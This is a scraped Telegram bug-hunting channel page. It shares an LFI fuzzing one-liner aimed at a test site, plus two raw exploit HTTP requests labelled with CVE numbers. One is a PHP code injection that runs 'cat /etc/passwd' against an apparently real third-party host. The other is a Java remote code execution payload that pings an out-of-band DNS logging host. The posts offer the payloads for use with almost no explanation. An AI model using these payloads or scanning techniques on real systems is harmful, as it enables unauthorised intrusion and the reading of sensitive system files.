haxshadow
4.21K subscribers
86 photos
1 video
27 files
141 links
ᴛʜɪs ᴄʜᴀɴɴᴇʟ ɪs ᴀʟʟ ᴀʙᴏᴜᴛ Bᴜɢ ʜᴜɴᴛɪɴɢ ﹠ Cʏʙᴇʀsᴇᴄ ﹠ Eᴛʜɪᴄᴀʟ Hᴀᴄᴋɪɴɢ ʀᴇʟᴀᴛᴇᴅ ᴄᴏɴᴛᴇɴᴛs.
any query msg me at @haxshadow_bot
Youtube:https://youtube.com/@haxshadow7
IF you want to support ;)
Download Telegram
try this amazingg auto scanner made by our brother..
https://github.com/wapiti-scanner/wapiti
try this amazingg LFI oneliner its veryfast and effective also change ffuf useragent so its dont get blocked by waf's

waymore -i "
testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done



waymore -i "
testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt


cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
👍3
CVE-2024-7954.yaml
1.7 KB
POST /index.php?action=porte_plume_previsu HTTP/2
Host: 3fpt.sn
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Channel name was changed to «Mr.Shadow»
CVE-2024-0195.yaml
2.1 KB
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
👍1
Coming soon..
1🔥1
Easy way to Find SSRF cve+manually+Automation | Bug bounty poc

https://youtu.be/zP0S8u0-BCE?si=l8v_eTXwnW1CxzEa
2🥰1
Channel photo updated